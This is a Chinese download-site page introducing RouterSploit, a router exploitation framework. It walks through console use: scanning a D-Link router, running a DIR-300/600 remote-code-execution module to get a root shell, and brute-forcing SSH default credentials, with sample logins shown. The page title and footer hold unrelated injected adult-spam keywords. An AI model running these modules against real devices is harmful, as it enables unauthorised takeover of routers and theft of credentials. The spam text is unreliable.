在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

電子發燒友App

硬聲App

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示
電子發燒友網>電子資料下載>電子資料>RouterSploit路由器漏洞檢測及利用框架

RouterSploit路由器漏洞檢測及利用框架

2022-05-06 | zip | 1.09 MB | 次下載 | 2積分

資料介紹

授權協議 BSD
開發語言 Python
軟件類型 開源軟件
所屬分類 管理和監控漏洞檢測掃描和評估

軟件簡介

RouteSploit框架是一款開源的漏洞檢測及利用框架,其針對的對象主要為路由器等嵌入式設備。

?

poYBAGJmgxCAV2qUAAVJLxMlZ7s144.jpg

框架功能

RouteSploit框架主要由可用于滲透測試的多個功能模塊組件組成,

1、 Scanners:模塊功能主要為檢查目標設備是否存在可利用的安全漏洞;

2、Creds:模塊功能主要針對網絡服務的登錄認證口令進行檢測;

3、Exploits:模塊功能主要為識別到目標設備安全漏洞之后,對漏洞進行利用,實現提權等目的。

工具安裝

sudo?apt-get?install?python-requests?python-paramiko?python-netsnmpgit?clone?https://github.com/reverse-shell/routersploit?./rsf.py

GitHub地址如上命令中所述為:RouteSploit。

操作使用

首先,啟動RouteSploit框架,具體如下所示

root@kalidev:~/git/routersploit#?./rsf.py?
?______????????????_????????????_____???????_???????_?_
?|?___?\??????????|?|??????????/??___|?????|?|?????(_)?|
?|?|_/?/___??_???_|?|_?___?_?__\?`--.?_?__?|?|?___??_|?|_
?|????//?_?\|?|?|?|?__/?_?\?'__|`--.?\?'_?\|?|/?_?\|?|?__|
?|?|\?\?(_)?|?|_|?|?||??__/?|??/\__/?/?|_)?|?|?(_)?|?|?|_
?\_|?\_\___/?\__,_|\__\___|_|??\____/|?.__/|_|\___/|_|\__|
?????????????????????????????????????|?|
?????Router?Exploitation?Framework???|_|

?Dev?Team?:?Marcin?Bury?(lucyoa)?&?Mariusz?Kupidura?(fwkz)
?Codename?:?Wildest?Dreams?version??:?1.0.0

rsf?>

1、Scanners 模塊

scanners模塊,具備設備漏洞掃描功能,通過該模塊,可快速識別目標設備是否存在可利用的安全漏洞,下面會以一個dlink路由器為例,結合進行操作描述。

(1)選擇scanners模塊,操作如下,

rsf?>?use?scanners/dlink_scan
rsf?(D-Link?Scanner)?>?show?options

(2)顯示選項

Target?options:

???Name???????Current?settings?????Description????????????????????????????????
???----???????----------------?????-----------????????????????????????????????
???target??????????????????????????Target?address?e.g.?http://192.168.1.1?????
???port???????80???????????????????Target?port

(3)設置目標設備IP

rsf?(D-Link?Scanner)?>?set?target?192.168.1.1
[+]?{'target':?'192.168.1.1'}

(4)運行模塊,執行情況如下,

rsf?(D-Link?Scanner)?>?run
[+]?exploits/dlink/dwr_932_info_disclosure?is?vulnerable
[-]?exploits/dlink/dir_300_320_615_auth_bypass?is?not?vulnerable
[-]?exploits/dlink/dsl_2750b_info_disclosure?is?not?vulnerable
[-]?exploits/dlink/dns_320l_327l_rce?is?not?vulnerable
[-]?exploits/dlink/dir_645_password_disclosure?is?not?vulnerable
[-]?exploits/dlink/dir_300_600_615_info_disclosure?is?not?vulnerable
[-]?exploits/dlink/dir_300_600_rce?is?not?vulnerable

[+]?Device?is?vulnerable!
?-?exploits/dlink/dwr_932_info_disclosure

如上所呈現的結果,目標設備存在dwr_932_info_disclosure漏洞。接下來,我們選擇合適的payload進行傳遞和測試(以下涉及exploits模塊功能操作,如需,請再往下查閱),

poYBAGJmgxKASDfdAALNW7XBsWE185.png

2、Exploits 模塊

(1)選擇Exploits模塊,操作如下,

rsf?>?use?exploits/
exploits/2wire/?????exploits/asmax/?????exploits/asus/??????exploits/cisco/?????exploits/dlink/?????exploits/fortinet/??exploits/juniper/???exploits/linksys/???exploits/multi/?????exploits/netgear/
rsf?>?use?exploits/dlink/dir_300_600_rce
rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>

我們也可以使用“tab”鍵來自動補充輸入命令。

(2)顯示選項

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?show?options

Target?options:


???Name???????Current?settings?????Description????????????????????????????????
???----???????----------------?????-----------????????????????????????????????
???target??????????????????????????Target?address?e.g.?http://192.168.1.1?????
???port???????80???????????????????Target?Port

設置選項,操作如下,

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?set?target?http://192.168.1.1
[+]?{'target':?'http://192.168.1.1'}

(3)運行模塊

通過使用“run”或“exploit”命令來完成漏洞的利用,

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?run
[+]?Target?is?vulnerable
[*]?Invoking?command?loop...
cmd?>?whoami
root

也可檢測目標設備是否存在選定的安全漏洞,操作如下,

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?check
[+]?Target?is?vulnerable

(4)顯示具體漏洞信息

通過“show info”命令,顯示漏洞信息,包括其存在的設備品牌、型號、漏洞類型及參考來源,具體參考如下,

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?show?info

Name:
D-LINK?DIR-300?&?DIR-600?RCE

Description:
Module?exploits?D-Link?DIR-300,?DIR-600?Remote?Code?Execution?vulnerability?which?allows?executing?command?on?operating?system?level?with?root?privileges.

Targets:
-?D-Link?DIR?300
-?D-Link?DIR?600

Authors:
-?Michael?Messner??#?vulnerability?discovery
-?Marcin?Bury??#?routersploit?module

References:
-?http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
-?http://www.s3cur1ty.de/home-Network-horror-days
-?http://www.s3cur1ty.de/m1adv2013-003

3、 Creds模塊

(1)選擇模塊

此模塊相關文件位于 /routesploit/modules/creds/ 目錄下,以下為該模塊支持檢測的服務,

? ftp?

? ssh

? telnet

? http basic auth

? http form auth

? snmp

在檢測過程中,可通過兩個層面對上述的每個服務進行檢測,

默認服務登錄口令檢測:利用框架提供的各類路由等設備以及服務的默認登錄口令字典,通過快速列舉的方式,可在較短時間內(幾秒鐘)驗證設備是否仍使用默認登錄口令;

暴力破解:利用框架中所提供的特定賬戶或者賬戶列表進行字典攻擊。其中包含兩個參數(登錄賬戶及密碼),如框架/routesploit/wordlists目錄中字典所示,參數值可以為一個單詞(如’admin’),或者是一整個單詞列表。

(2)控制臺

rsf?>?use?creds/
creds/ftp_bruteforce?????????creds/http_basic_bruteforce??creds/http_form_bruteforce???creds/snmp_bruteforce????????creds/ssh_default????????????creds/telnet_default?????????
creds/ftp_default????????????creds/http_basic_default?????creds/http_form_default??????creds/ssh_bruteforce?????????creds/telnet_bruteforce??????
rsf?>?use?creds/ssh_default
rsf?(SSH?Default?Creds)?>

(3)顯示選項

pYYBAGJmgxSALUeZAAGIXAXImbc290.png

(4)設置目標設備IP

rsf?(SSH?Default?Creds)?>?set?target?192.168.1.53
[+]?{'target':?'192.168.1.53'}

(5)運行模塊

rsf?(SSH?Default?Creds)?>?run
[*]?Running?module...
[*]?worker-0?process?is?starting...
[*]?worker-1?process?is?starting...
[*]?worker-2?process?is?starting...
[*]?worker-3?process?is?starting...
[*]?worker-4?process?is?starting...
[*]?worker-5?process?is?starting...
[*]?worker-6?process?is?starting...
[*]?worker-7?process?is?starting...
[-]?worker-4?Authentication?failed.?Username:?'3comcso'?Password:?'RIP000'
[-]?worker-1?Authentication?failed.?Username:?'1234'?Password:?'1234'
[-]?worker-0?Authentication?failed.?Username:?'1111'?Password:?'1111'
[-]?worker-7?Authentication?failed.?Username:?'ADVMAIL'?Password:?'HP'
[-]?worker-3?Authentication?failed.?Username:?'266344'?Password:?'266344'
[-]?worker-2?Authentication?failed.?Username:?'1502'?Password:?'1502'

(..)

Elapsed?time:??38.9181981087?seconds
[+]?Credentials?found!

Login?????Password?????
-----?????--------?????
admin?????1234?????????

rsf?(SSH?Default?Creds)?>

介紹內容來自 FreeBuf黑客與極客

?

下載該資料的人也在下載 下載該資料的人還在閱讀
更多 >

評論

查看更多

下載排行

本周

  1. 1山景DSP芯片AP8248A2數據手冊
  2. 1.06 MB  |  532次下載  |  免費
  3. 2RK3399完整板原理圖(支持平板,盒子VR)
  4. 3.28 MB  |  339次下載  |  免費
  5. 3TC358743XBG評估板參考手冊
  6. 1.36 MB  |  330次下載  |  免費
  7. 4DFM軟件使用教程
  8. 0.84 MB  |  295次下載  |  免費
  9. 5元宇宙深度解析—未來的未來-風口還是泡沫
  10. 6.40 MB  |  227次下載  |  免費
  11. 6迪文DGUS開發指南
  12. 31.67 MB  |  194次下載  |  免費
  13. 7元宇宙底層硬件系列報告
  14. 13.42 MB  |  182次下載  |  免費
  15. 8FP5207XR-G1中文應用手冊
  16. 1.09 MB  |  178次下載  |  免費

本月

  1. 1OrCAD10.5下載OrCAD10.5中文版軟件
  2. 0.00 MB  |  234315次下載  |  免費
  3. 2555集成電路應用800例(新編版)
  4. 0.00 MB  |  33566次下載  |  免費
  5. 3接口電路圖大全
  6. 未知  |  30323次下載  |  免費
  7. 4開關電源設計實例指南
  8. 未知  |  21549次下載  |  免費
  9. 5電氣工程師手冊免費下載(新編第二版pdf電子書)
  10. 0.00 MB  |  15349次下載  |  免費
  11. 6數字電路基礎pdf(下載)
  12. 未知  |  13750次下載  |  免費
  13. 7電子制作實例集錦 下載
  14. 未知  |  8113次下載  |  免費
  15. 8《LED驅動電路設計》 溫德爾著
  16. 0.00 MB  |  6656次下載  |  免費

總榜

  1. 1matlab軟件下載入口
  2. 未知  |  935054次下載  |  免費
  3. 2protel99se軟件下載(可英文版轉中文版)
  4. 78.1 MB  |  537798次下載  |  免費
  5. 3MATLAB 7.1 下載 (含軟件介紹)
  6. 未知  |  420027次下載  |  免費
  7. 4OrCAD10.5下載OrCAD10.5中文版軟件
  8. 0.00 MB  |  234315次下載  |  免費
  9. 5Altium DXP2002下載入口
  10. 未知  |  233046次下載  |  免費
  11. 6電路仿真軟件multisim 10.0免費下載
  12. 340992  |  191187次下載  |  免費
  13. 7十天學會AVR單片機與C語言視頻教程 下載
  14. 158M  |  183279次下載  |  免費
  15. 8proe5.0野火版下載(中文版免費下載)
  16. 未知  |  138040次下載  |  免費
主站蜘蛛池模板: 亚洲一区二区三区网站| 高颜值美女啪啪| 午夜爱爱网站| 狠狠干夜夜操| 日本免费在线一区| 欧美日韩国产一区二区| 窝窝午夜视频| 欧美黄一片| 视频在线二区| 欧美成人生活片| 天天操天天插天天射| 日本不卡在线观看| 毛片免费观看| 久久国产午夜精品理论篇小说| 九九免费久久这里有精品23| 网络色综合久久| 国产区一区二区三| 国产欧美日韩va| 香港三级理论在线影院| 国产激烈床戏无遮挡在线观看| 春宵福利网站| 四虎最新永久免费网址| 99伊人| 又粗又大又爽又色又过瘾视频| 日韩精品一级毛片| 手机看片日韩永久福利盒子| 老师我好爽再深一点好大| 激情五月综合网| 天天舔天天色| 狠狠色噜狠狠狠狠| 黄色免费的视频| 色www国产阿娇| 欧美午夜视频在线| 亚洲夜夜操| 李老汉的性生生活1全部| 精品特级毛片| 黄色三级欧美| 男人的天堂视频在线| 狠狠草视频| 日本三级吹潮| 国产午夜精品视频|